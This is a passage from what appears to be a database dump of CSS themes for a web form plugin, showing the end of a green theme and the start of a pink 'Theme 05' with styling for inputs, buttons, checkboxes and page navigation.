margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/02/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #B6E4CF;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 0px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: \" \";\r\n	position: relative;\r\n	width: 97.7{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break{\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #018D08;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00AC0A;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018F08 ;\r\n	background: -moz-linear-gradient(left, #018D08 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018F08 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00BE0A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018D08 ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018F08 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00BE0A ));\r\n	background: -webkit-linear-gradient(left, #018D08 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018F08 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00BE0A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -o-linear-gradient(left, #018D08 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018F08 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00BE0A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -ms-linear-gradient(left, #018D08 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018F08 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00BE0A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to right, #018D08 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018F08 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00BE0A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #CEE0D3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(19,'Theme 05 pink','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B05785;\r\nborder: 1px solid #F6E2ED;\r\nmargin-bottom: 10px;\r\ncolor: #F6E2ED;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/03/nextbg_hover.png) url([SITE_ROOT]/images/05/03/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/03/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6E2ED;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: \" \";\r\n	position: relative;\r\n	width: 97.7{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: 